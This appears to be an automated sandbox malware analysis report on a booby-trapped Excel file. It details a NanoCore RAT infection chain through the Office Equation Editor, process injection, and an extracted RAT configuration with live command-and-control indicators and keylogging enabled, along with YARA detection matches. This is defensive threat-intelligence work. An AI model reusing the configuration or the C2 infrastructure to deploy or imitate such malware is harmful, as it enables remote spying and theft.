Play interactive tour

Edit tour

Analysis Report Original title deed.xlsx

Overview

General Information

Sample Name:	Original title deed.xlsx
Analysis ID:	402636
MD5:	97ffd7670cb87a5e565a82394ec28d77
SHA1:	138d3a2105ff5cf1b8d55a9a25b1d8f34b07c121
SHA256:	c54436c4152096f4cc05b88c7c9f76f30dea38d4569ef5303a527bc79f22560b
Tags:	NanoCoreRATVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2984 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2280 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2636 cmdline: 'C:\Users\Public\vbc.exe' MD5: 042AA11C6D49E1CCA5923F02D1B0A5AE)

RegSvcs.exe (PID: 2360 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
00000005.00000002.2597641186.0000000000820000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
00000005.00000002.2597438390.0000000000590000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
00000005.00000002.2597886423.0000000002160000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
00000005.00000002.2597593122.0000000000790000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
00000005.00000002.2597600181.00000000007A0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
00000005.00000002.2597411423.0000000000520000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000005.00000002.2597403893.0000000000500000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
00000005.00000002.2597470836.0000000000610000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
00000005.00000002.2597453930.00000000005B0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1111f:$a: NanoCore 0x11178:$a: NanoCore 0x111b5:$a: NanoCore 0x1122e:$a: NanoCore 0x19d2e:$a: NanoCore 0x19d53:$a: NanoCore 0x19dac:$a: NanoCore 0x29f57:$a: NanoCore 0x29f7d:$a: NanoCore 0x29fd9:$a: NanoCore 0x36e37:$a: NanoCore 0x36e90:$a: NanoCore 0x36ec3:$a: NanoCore 0x370ef:$a: NanoCore 0x3716b:$a: NanoCore 0x37784:$a: NanoCore 0x378cd:$a: NanoCore 0x37da1:$a: NanoCore 0x38088:$a: NanoCore 0x3809f:$a: NanoCore 0x3d645:$a: NanoCore
00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
00000005.00000002.2597464017.0000000000600000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x29f29d:$x1: NanoCore.ClientPluginHost 0x3242bd:$x1: NanoCore.ClientPluginHost 0x29f2da:$x2: IClientNetworkHost 0x3242fa:$x2: IClientNetworkHost 0x2a2e0d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x327e2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x29f005:$a: NanoCore 0x29f015:$a: NanoCore 0x29f249:$a: NanoCore 0x29f25d:$a: NanoCore 0x29f29d:$a: NanoCore 0x324025:$a: NanoCore 0x324035:$a: NanoCore 0x324269:$a: NanoCore 0x32427d:$a: NanoCore 0x3242bd:$a: NanoCore 0x29f064:$b: ClientPlugin 0x29f266:$b: ClientPlugin 0x29f2a6:$b: ClientPlugin 0x324084:$b: ClientPlugin 0x324286:$b: ClientPlugin 0x3242c6:$b: ClientPlugin 0x29f18b:$c: ProjectData 0x3241ab:$c: ProjectData 0x29fb92:$d: DESCrypto 0x324bb2:$d: DESCrypto 0x2a755e:$e: KeepAlive
Process Memory Space: vbc.exe PID: 2636	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 2360	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x297e7:$x1: NanoCore.ClientPluginHost 0x5509e:$x1: NanoCore.ClientPluginHost 0x9b147:$x1: NanoCore.ClientPluginHost 0x134317:$x1: NanoCore.ClientPluginHost 0x155c74:$x1: NanoCore.ClientPluginHost 0x17a2ad:$x1: NanoCore.ClientPluginHost 0x1840fa:$x1: NanoCore.ClientPluginHost 0x186ee2:$x1: NanoCore.ClientPluginHost 0x1917fe:$x1: NanoCore.ClientPluginHost 0x1a437b:$x1: NanoCore.ClientPluginHost 0x1a6d65:$x1: NanoCore.ClientPluginHost 0x1aa1ba:$x1: NanoCore.ClientPluginHost 0x1acda5:$x1: NanoCore.ClientPluginHost 0x1b3f49:$x1: NanoCore.ClientPluginHost 0x1b8da4:$x1: NanoCore.ClientPluginHost 0x1c5580:$x1: NanoCore.ClientPluginHost 0x1cc6ce:$x1: NanoCore.ClientPluginHost 0x1f9e37:$x1: NanoCore.ClientPluginHost 0x2035e2:$x1: NanoCore.ClientPluginHost 0x20b2dd:$x1: NanoCore.ClientPluginHost 0x225fe6:$x1: NanoCore.ClientPluginHost
Process Memory Space: RegSvcs.exe PID: 2360	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2360	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x29776:$a: NanoCore 0x297a6:$a: NanoCore 0x297e7:$a: NanoCore 0x31502:$a: NanoCore 0x31518:$a: NanoCore 0x3153f:$a: NanoCore 0x4a36b:$a: NanoCore 0x4f252:$a: NanoCore 0x4f277:$a: NanoCore 0x4f2c0:$a: NanoCore 0x4f638:$a: NanoCore 0x55018:$a: NanoCore 0x55045:$a: NanoCore 0x5509e:$a: NanoCore 0x5c8ad:$a: NanoCore 0x5c8c0:$a: NanoCore 0x5c8f2:$a: NanoCore 0x8caad:$a: NanoCore 0x8ce9f:$a: NanoCore 0x8ff20:$a: NanoCore 0x91166:$a: NanoCore
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.RegSvcs.exe.600000.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
5.2.RegSvcs.exe.600000.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
5.2.RegSvcs.exe.500000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.RegSvcs.exe.500000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
5.2.RegSvcs.exe.590000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.RegSvcs.exe.590000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2100000.13.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2100000.13.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2100000.13.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.2160000.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2160000.16.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
5.2.RegSvcs.exe.7a0000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
5.2.RegSvcs.exe.7a0000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
5.2.RegSvcs.exe.590000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
5.2.RegSvcs.exe.590000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
5.2.RegSvcs.exe.7a0000.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
5.2.RegSvcs.exe.7a0000.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
5.2.RegSvcs.exe.26a6198.22.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.26a6198.22.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.RegSvcs.exe.790000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
5.2.RegSvcs.exe.790000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
5.2.RegSvcs.exe.389b840.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.389b840.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.780000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
5.2.RegSvcs.exe.780000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
5.2.RegSvcs.exe.820000.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
5.2.RegSvcs.exe.820000.11.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
4.2.vbc.exe.3940110.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x951ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x951ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x98d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3940110.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3940110.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x94f15:$a: NanoCore 0x94f25:$a: NanoCore 0x95159:$a: NanoCore 0x9516d:$a: NanoCore 0x951ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x94f74:$b: ClientPlugin 0x95176:$b: ClientPlugin 0x951b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x9509b:$c: ProjectData 0x10a82:$d: DESCrypto 0x95aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
5.2.RegSvcs.exe.220e8a4.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
5.2.RegSvcs.exe.220e8a4.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
5.2.RegSvcs.exe.610000.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
5.2.RegSvcs.exe.610000.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
5.2.RegSvcs.exe.3887649.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x333d2:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x333ec:$x2: IClientNetworkHost
5.2.RegSvcs.exe.3887649.23.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x333d2:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x3670f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x333bf:$s5: IClientLoggingHost
5.2.RegSvcs.exe.3887649.23.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.820000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
5.2.RegSvcs.exe.820000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.5b0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
5.2.RegSvcs.exe.5b0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
5.2.RegSvcs.exe.520000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.520000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
5.2.RegSvcs.exe.26b23d8.20.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
5.2.RegSvcs.exe.26b23d8.20.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.RegSvcs.exe.780000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
5.2.RegSvcs.exe.780000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
5.2.RegSvcs.exe.790000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
5.2.RegSvcs.exe.790000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
5.2.RegSvcs.exe.389b840.25.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.389b840.25.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.600000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
5.2.RegSvcs.exe.600000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
